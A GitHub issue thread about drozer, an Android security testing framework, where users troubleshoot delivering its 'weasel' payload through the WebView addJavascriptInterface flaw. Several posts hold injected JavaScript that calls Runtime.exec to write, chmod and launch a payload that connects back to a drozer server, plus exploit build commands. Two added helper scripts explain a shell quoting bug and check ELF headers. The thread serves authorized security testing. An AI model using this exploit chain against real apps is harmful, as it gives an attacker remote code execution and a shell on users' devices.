
Drozer Shell Injection, Octal Escaping and /system/bin/ash #102

Closed
joswr1ght opened this issue Oct 12, 2013 · 27 comments

Comments

@joswr1ght

In the "WebView addJavascriptInterface Remote Code Execution" article, there is a great introduction to drozer payload injection using the addJavaScriptInterface flaw. However, I think the payload delivery method is broken on Android devices running /system/bin/ash.

The article recommends this line for creating a payload to inject through malicious JavaScript:

    $ drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
    print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'}

Which will give you a one liner:

    execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);

However, it does not appear that the /system/bin/sh (which is ash) appropriately accommodates octal escaping in this manner:

    # /system/bin/sh -c echo -e "\0177\0105\0114\0106\0001\0001" >f
    # ls -l f
    -rw-rw-rw- root     root            1 2013-10-12 23:06 f

It looks like ash does not preserve the input data, leaving us with a 1 byte file (expected 6 bytes). Not to be discriminatory, ash doesn't preserve the input data for hex escaping either:

    # /system/bin/sh -c echo -e "\x41\x41\x41\x41" >f
    # ls -l f
    -rw-rw-rw- root     root            1 2013-10-12 23:12 f

I'm testing this on an Android API15 emulator. Any thoughts on getting escaped binary content delivered to Android devices for Weasel deployment reliably?

Thanks,

-Josh

@metall0id
Contributor

I am not sure I understand what you mean. Do you mean that some devices do not have /system/bin/sh and so the current weasel stager will fail?

@joswr1ght
Author

No, AFAIK, all Android devices have /system/bin/sh, which is a symlink to /system/bin/ash. The ash binary doesn't properly preserve the escaped octal content, preventing us from encoding and delivering the Weasel binary in the described method.

Maybe you can let us know what Android release you used for your demonstration with weasel? I can see if there are any changes between that and other versions of ash.

Thanks,

-Josh

@metall0id
Contributor

I have tested this on emulators and predominantly Samsung devices that I own. Devices that I can recall where I know it works 100% are:

  • ICS emulator
  • Galaxy Tab - running 2.2
  • Galaxy S2 - running 2.3
  • Galaxy S3 - running 4.1.2
  • Galaxy S4 - running latest
  • HTC Legend - running 2.1

Which devices are you seeing this on?

If I run ash on a linux box - I see that it includes the -e in the output (which it needs when using sh), as follows:

    $ echo -e "\0101"
    -e A

Is this what you are seeing?

@joswr1ght
Author

Ah, frag. I was screwing this up all along:

    # /system/bin/sh -c "echo -e '\0177\0105\0114\0106\0001\0001' >f"
    # ls -l f
    ----rwxr-x system   sdcard_rw        7 2013-10-13 00:02 f

The arguments passed to "sh -c" need to be in quotes.

I suck. Sorry about that.

Do you think you could post your whole working drozer.js script, with the escaped Weasel code? I have command injection working just fine, but keep getting messed up on getting the escaped code right.

Thanks!

-Josh
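As an added illustration of the quoting pitfall discussed in the two posts above (this script is not from the thread or from drozer), the following contrasts the unquoted and quoted `sh -c` invocations and shows what the inner shell actually receives. It assumes a POSIX `sh`, `printf` and `mktemp` are available; `printf` with `\NNN` octal escapes is used in place of `echo -e` so the result is identical under dash, bash and busybox ash. The six bytes are the ELF magic `\177ELF` followed by two `\001` bytes, as in the issue's own example.

```shell
#!/bin/sh
# Added example, not from the issue thread: why `sh -c echo -e "..." > f`
# leaves a 1-byte file while the quoted form writes every byte.
#
# Unquoted: the *outer* shell splits the words. sh gets the command string
# "echo"; "-e" becomes $0 and the escape string becomes $1 of that sh.
# echo therefore runs with no arguments and prints a bare newline, and the
# outer shell's `> f` captures exactly that: one byte.
#
# Quoted: the whole "printf ... > f" string is the command, so the inner
# shell both interprets the escapes and performs the redirection.
# Assumptions: POSIX sh, printf and mktemp exist on the system.

tmpdir=$(mktemp -d)
trap 'rm -rf "$tmpdir"' EXIT

# Unquoted form; returns the byte count of the resulting file (1).
unquoted_size() {
    sh -c echo -e '\0177\0105\0114\0106\0001\0001' > "$tmpdir/unquoted"
    wc -c < "$tmpdir/unquoted" | tr -d ' '
}

# Quoted form; the inner shell sees the escapes and the redirect (6 bytes).
# \\ inside the outer double quotes becomes a single backslash for printf.
quoted_size() {
    sh -c "printf '\\177\\105\\114\\106\\001\\001' > '$tmpdir/quoted'"
    wc -c < "$tmpdir/quoted" | tr -d ' '
}

# Show what the inner shell actually received in the unquoted case:
# $0 is "-e" and $1 is the untouched escape string.
unquoted_argv() {
    sh -c 'printf "%s|%s\n" "$0" "$1"' -e '\0177\0105'
}

echo "unquoted form wrote $(unquoted_size) byte(s)"
echo "quoted form wrote   $(quoted_size) byte(s)"
echo "inner shell saw \$0|\$1 = $(unquoted_argv)"
```

The unquoted form hands `sh` the single word `echo` as its command string; everything after it is positional data that `echo` never looks at, which is why the thread's first attempt produced a one-byte file regardless of how the escapes were written.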

@metall0id
Contributor

No problem :) Really glad that this does work universally - I really tried to test the method thoroughly.

I don't have my MWR laptop with me at the moment. Will be able to get back to you about that escaped weasel code tomorrow (Sunday) night. We are going through testing stages for the full-on MiTM exploit module for drozer that works on every app that is vulnerable to this issue.

There is some pretty neat stuff in there that you may be interested in.

Tyrone

@joswr1ght
Author

I'd love to see that. Great work on :1,$s/Mercury/Drozer/g. I'm surprised more media outlets haven't caught on to Drozer and this addJSInterface issue. -Josh

@joswr1ght
Author

Any word on getting that complete drozer.js posted? Thanks! -Josh

@metall0id
Contributor

Hi,

Sorry for the delayed reply. I have put it here for you: https://www.dropbox.com/s/x4zdgj9j0k0uvxm/dz.js.zip

Please note that this is the output generated by the drozer exploit that we are releasing soon :)

You will have to change the IP address that weasel calls back to (which should be the IP of your drozer server).

@metall0id
Contributor

Please let me know once you have downloaded this so that I can remove this file.

Did it work for you? :)

@joswr1ght
Author

I grabbed it, thank you! I'll try it tomorrow, but it looks awesome. Nice job automatically enumerating the JS interface! -Josh

@metall0id
Contributor

Hi,

drozer.js is now implemented in https://github.com/mwrlabs/drozer/blob/master/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py - go check it out.

If I am not mistaken, "weasel.shell.armeabi" (in fact, every drozer payload) is basically designed to work with ARM architecture.

You are correct. drozer does not have payloads for anything other than ARM.

@shivang1989

hey Tyrone,

Thank you for clearing my doubt regarding ARM. I appreciate it.

Regards
-Shiv

@tersark

tersark commented Apr 9, 2014

I'm trying to deploy a weasel in an Android emulator. I'm using Windows and therefore I'm not executing this command fully:

    drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
    print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'}

However, I should get the connection to the drozer server with the following injected code, shouldn't I?

    var host = '10.0.2.2';
    var port = '31415';
    var path = '/data/data/com.vuln.app/files/weasel';
    function execute(cmd){
      return window.interface.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
    }
    execute(['/system/bin/rm',path]);
    execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);
    execute(['/system/bin/chmod','770',path]);
    execute([path,host,port]);

What am I doing wrong?

@metall0id
Contributor

I am struggling to understand your question. Let's take a step back and explain the following to me:

  • What module are you running?
  • Why are you trying to build the payload manually?
  • Are you exploiting the Android browser or another application with a JS interface?

@tersark

tersark commented Apr 11, 2014

Sorry for my bad expression.
I'm trying to follow this article: https://labs.mwrinfosecurity.com/blog/2013/09/24/webview-addjavascriptinterface-remote-code-execution/

The thing is that I'm using Windows and I cannot execute this command:

    drozer payload build weasel.shell.armeabi | grep echo | awk -F \" {'gsub("\\\\","\\\\");
    print "execute([\x27/system/bin/sh\x27,\x27-c\x27,\x27 echo -e \\\""$2"\\\" > \x27+path]);"'}

But the thing is that this command is to build the weasel, therefore it is not needed to make the mobile device connect to the drozer server.

I'm working with an emulator and I am injecting the following JavaScript code into an app. In theory the emulator should connect to the drozer server even if the weasel was not built, shouldn't it?

    var host = '10.0.2.2';
    var port = '31415';
    var path = '/data/data/com.vuln.app/files/weasel';
    function execute(cmd){
      return window.interface.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(cmd);
    }
    execute(['/system/bin/rm',path]);
    execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);
    execute(['/system/bin/chmod','770',path]);
    execute([path,host,port]);

@metall0id
Contributor

    execute(['/system/bin/sh','-c','echo -e "…………………" > '+path]);

This line is where the output of that weasel command goes. The "...." part cannot work as is.

Please see the following module that is already in drozer that exploits this issue: https://github.com/mwrlabs/drozer/blob/master/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py

This exploit is slightly more up-to-date than that article as well.

@tersark

tersark commented Apr 13, 2014

Sorry about the last comment, afterwards I realized this. However, I used a virtual machine to build the payload but it is not working either :(. I've tried to generate the payload again using $ drozer payload build weasel.shell.armeabi > weasel and then change the IP in the weasel file to 10.0.2.2 (because I will run it in an emulator). I pushed it to the device, leaving only this code:

    var host = '10.0.2.2';
    var port = '31415';
    var path = '/data/data/com.example.vulnerableapp/files/weasel';
    execute(['/system/bin/chmod','770',path]);
    document.write(window.jsinterface.getSomeString()); // doesn't reach here
    execute([path,host,port]);

but it doesn't work either...

The code you passed me is the code of the drozer application, right? IDK how to use it :(

thanks for all the help

@metall0id
Contributor

You do not need to manually change the IP address, you can use the --server 10.0.2.2 flag when building weasel.

The code I linked in my last comment is already in drozer. To use it do:

    drozer exploit build exploit.remote.mitm.addjavascriptinterface --server 10.0.2.2 --payload weasel.shell.armeabi

@joswr1ght
Author

As a silent lurker on this thread, let me say that you are awesome Tyrone!

-Josh

On Apr 14, 2014, at 5:51 PM, Tyrone Erasmus notifications@github.com wrote:

> You do not need to manually change the IP address, you can use the --server 10.0.2.2 flag when building weasel.
>
> The code I linked in my last comment is already in drozer. To use it do:
>
>     drozer exploit build exploit.remote.mitm.addjavascriptinterface --server 10.0.2.2 --payload weasel.shell.armeabi

@tersark

tersark commented Apr 15, 2014

I'm sorry for not getting this, but this command is for attacking an app, right? All I'm getting is: Uploading weasel to /weasel and W...timed out

I've tried to build the payload again using the server flag like this:

    drozer payload build --server 10.0.2.2 weasel.shell.armeabi > weasel

Then I've pushed the file to the right path inside the device and tried to execute it with

    execute([path]);

However I'm getting "error calling npobject".

I know I should inject the weasel code in the JavaScript but I've done this to at least try whether the code executes something inside the device.

I have to do this because the following line is not creating a file in the device:

    execute(['/system/bin/sh','-c','echo -e \"\0177...\0000\" > '+path]);

Sorry for all the inconvenience and thank you very much for all your effort!

@tersark

tersark commented Apr 16, 2014

Hello again!

I've been doing some experiments trying to make this work for me. It's weird but, as I said in the previous post, the following line is not generating any file:

    execute(['/system/bin/sh','-c','echo -e "\0177...\0000" > '+path]);

However, if I just take the first characters like in the following line, the file is created just fine.

    execute(['/system/bin/sh','-c','echo -e "\0177\0105\0114\0106" > '+path]);

Any ideas on what could be happening?

Thank you very much!

@metall0id
Contributor

Thank you @joswr1ght :)

@tersark: If you can get it to write any content to a file then the exploit is working correctly. As for the weasel code not being written out - that is a mystery to me. Try breaking up the problem: for instance, do adb shell and try to perform the exact command. Get the exact weasel output that is used in the exploit by doing:

    drozer payload build weasel.shell.armeabi --server 10.0.2.2

More than debugging this one line at a time I am not sure what else to do without being able to replicate this problem on your specific device.

EDIT: You may want to use --working-directory /data/local/tmp when testing it from adb

@tersark

tersark commented Apr 16, 2014

Hi, I've tried to copy line by line, but the weasel line is too big for the command buffer (I imagine, because I can't paste the whole line) so I've pushed a file with the code created by drozer.
This is what I'm getting:

    root@android:/data/local/tmp # ./weas.adb
    ./weas.adb
    : No such file or directorycal/tmp
    ./weas.adb[5]: ./w: not found
    : not found6]:
    127|root@android:/data/local/tmp #

The thing is that now a file named w appears in the directory but it seems invisible to commands such as rm or just trying to execute the file, although it's there and it has the right permissions.

    127|root@android:/data/local/tmp # ls -l
    ls -l
    -rwxrwx--- root     root        21841 2014-04-16 17:03 w
    -rwxrwxrwx root     root       109301 2014-04-16 16:48 weas.adb
    root@android:/data/local/tmp # ./w 10.0.2.2 31415
    ./w 10.0.2.2 31415
    /system/bin/sh: ./w: not found
    127|root@android:/data/local/tmp # rm ./w
    rm ./w
    rm failed for ./w, No such file or directory

very weird :S

@metall0id
Contributor

This is very unusual behaviour - maybe try on a different phone or emulator? :) You do not need root on the device that you will be testing on.

@tersark

tersark commented Apr 18, 2014

I've tried in a different emulator, the file is created but when I try to execute it with the adb shell this is what I get (fragment):

    ./weasel[180]: 0∟2♫5└Ç0└Ç0☺2▲0☻0☻2∟2♫3└Ç0└Ç0♥2└Ç5└Ç0¶0∟1: not found
    ./weasel[181]: 1└Ç0└Ç0↔2▬2└Ç0: not found
    0▼7▼7↔3►0☻0☻0∟2☺4♠0‼5∟5☼7└Ç0└Ç0∟2▲6▼7▼7♥2►17►3∟2☻0└Ç4►3∟0└Ç0¶0◄5∟5☺4└Ç0◄5∟5└Ç5└Ç0¶0∟1↓1▼7▼7↔2▬3└Ç0: not found
    ./weasel[183]: 0∟3└Ç7└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♂2▼7▼7↔3└Ç1☻0¶0∟3☺7♠0└Ç0∟2▲0♦0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1☻7└Ç0└Ç0↔2▼4♠0└Ç0∟2▬4└Ç0: not found
    ./weasel[184]: 3∟3└Ç0└Ç0└Ç2└Ç0└Ç4☻2└Ç1♦0►4└Ç2└Ç1♦0►4☻2└Ç5└Ç0¶0└Ç1└Ç2☻0¶0└Ç3└Ç1♦7►2└Ç3└Ç5└Ç0¶0☻1└Ç1☻0¶0☻3└Ç2♦7►2☻3♥7└Ç0└Ç0↔2↑0└Ç0: not found
    ./weasel[185]: 3∟3♠1└Ç0└Ç0♥2↑6└Ç0: not found
    ./weasel[186]: 0∟3☺0└Ç0└Ç0♥2└Ç6└Ç0¶0∟1▼7▼7↔3└Ç3☻0¶0∟3☺7♠0└Ç0∟2▲0♦0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1└Ç2♦6►3∟1☻2└Ç0└Ç0↔2↑7└Ç0: not found
    ./weasel[187]: 0∟3☺0└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♠6▼7▼7↔3└Ç0♦0: not found
    ./weasel[188]: 0∟2♣4└Ç0└Ç0☺2▲0♠0☻2∟2♣2└Ç0└Ç0♥2└Ç5└Ç0¶0∟1└Ç4☻0¶0∟3♦4└Ç0└Ç0↔2▼0♠0└Ç0∟2↑0└Ç0: not found
    ./weasel[189]: 3∟3└Ç6└Ç0└Ç0♥2☺0└Ç0∟2└Ç1♦0►4∟2└Ç5└Ç0¶0∟1└Ç3☻0¶0∟3☺2♣0►2∟3└Ç1♠0¶0∟1♥2└Ç0└Ç0↔2↓0└Ç0: not found
    ./weasel[190]: 0∟3└Ç4└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♦1▼7▼7↔3▲0♦0└Ç0∟2☻0♦0►2∟2└Ç4└Ç0└Ç0↔2↓1└Ç0: not found
    ./weasel[191]: 0∟3☻4└Ç0└Ç0♥2└Ç6└Ç0¶0∟1♥2▼7▼7↔3▲0♦0└Ç0∟2☺7♠0└Ç0∟2└Ç1♠0►3∟2└Ç5└Ç0¶0∟1└Ç1☻0¶0∟3└Ç2♦6►3∟1└Ç7└Ç0└Ç0↔2▼0♠0└Ç0∟2→0└Ç0: not found
    ./weasel[192]: 3∟3☺0└Ç0└Ç0♥2└Ç0└Ç0∟2└Ç1♦0►4∟2└Ç5└Ç0¶0∟1└Ç1☻0¶0∟3└Ç2♦7►2∟3└Ç5♠0¶0∟33▼5▼7↔3└Ç0└Ç0: not found
    ./weasel[193]: 0∟3♦3▼7▼7☺2☺1└Ç0¶0∟3☻0→0◄5∟2▲0►7↨5↔0♥0♣5↔1: not found
    ./weasel[194]: 0∟3▼7☼7▬0§3☺0►0▼4∟3▼7☼7§3└Ç7▬1►00∟4▼7☼7♀4☺1└Ç0└Ç04↔3▼7☼7└Ç1└Ç0└Ç0└Ç0: not found

Would it be possible to contact you in a live chat?

Thank you very much for everything!

@joswr1ght
Author

Is this emulator target ARM or x86/Atom? If you download the file to a Linux box, what does "file weasel" say?

-Josh

On Apr 18, 2014, at 11:49 AM, tersark notifications@github.com wrote:

> I've tried in a different emulator, the file is created but when I try to execute it with the adb shell this is what I get (fragment)

@tersark

tersark commented Apr 18, 2014

The emulator is an ARM one. I've pulled the file and tried that command in a Linux environment. The result is:

    ./weaselAndroid: data

Thanks!
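The thread ends with `file` reporting the pulled binary as "data", and earlier the shell printed "./weasel[180]: ...: not found" for every line: when the kernel refuses to exec a file that does not carry a valid ELF header, the shell falls back to reading it as a script. The following script, added here as an example and not part of the thread or of drozer, is the check a tester would run before anything else: it verifies the ELF magic and reads the e_machine field so a payload built for ARM can be told apart from one for x86 (standard ELF constants: 3 = x86, 40 = ARM, 62 = x86-64, 183 = AArch64). It assumes POSIX `od`, `head`, `printf` and `mktemp`; the ARM-style header and the plain-text file it inspects are constructed inline.

```shell
#!/bin/sh
# Added example, not from the issue thread: sanity-check a built payload
# file before pushing it. A file that is not a real ELF is what makes
# /system/bin/sh try to run it as a script and spew "not found" lines.
# Assumptions: POSIX od, head, printf and mktemp are available.

# Print the first four bytes of a file as space-separated octal,
# e.g. "177 105 114 106" for a real ELF file.
magic_octal() {
    echo $(head -c 4 "$1" | od -An -t o1)
}

# Succeed only if the file starts with the ELF magic \177ELF.
is_elf() {
    [ "$(magic_octal "$1")" = "177 105 114 106" ]
}

# Print e_machine (2 bytes at offset 18, little-endian on ARM and x86)
# as a decimal number, or "not-elf" / "truncated" when it cannot be read.
elf_machine() {
    if ! is_elf "$1"; then
        echo "not-elf"
        return 0
    fi
    set -- $(od -An -t u1 -j 18 -N 2 "$1")
    if [ $# -ne 2 ]; then
        echo "truncated"
        return 0
    fi
    echo $(( $1 + $2 * 256 ))
}

# Map the e_machine values relevant to this thread to names.
elf_machine_name() {
    case "$(elf_machine "$1")" in
        3)       echo "x86" ;;
        40)      echo "ARM" ;;
        62)      echo "x86-64" ;;
        183)     echo "AArch64" ;;
        not-elf) echo "not an ELF file (sh would try to run it as a script)" ;;
        *)       echo "other or unreadable ELF machine" ;;
    esac
}

# Constructed sample inputs (not real payloads): a minimal ELF header with
# e_machine = 0x28 (ARM), and a plain-text file like the one `file`
# would report as "data".
tmpdir=$(mktemp -d)
trap 'rm -rf "$tmpdir"' EXIT

# 16-byte e_ident (\177ELF, class 1, LE data, version 1, 9 zero bytes),
# then e_type = 2 (EXEC) and e_machine = 40 (\050) in little-endian.
printf '\177ELF\001\001\001\000\000\000\000\000\000\000\000\000\002\000\050\000' > "$tmpdir/arm.elf"
printf 'this is just text\n' > "$tmpdir/notelf"

echo "arm.elf: $(elf_machine_name "$tmpdir/arm.elf")"
echo "notelf:  $(elf_machine_name "$tmpdir/notelf")"
```

Run `elf_machine_name` against the file actually pulled from the device: a result of "not an ELF file" means the bytes were corrupted on the way in (by the shell, by a text-mode transfer, or by an editor used to change the IP), and a machine other than ARM means the emulator image and the payload do not match.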
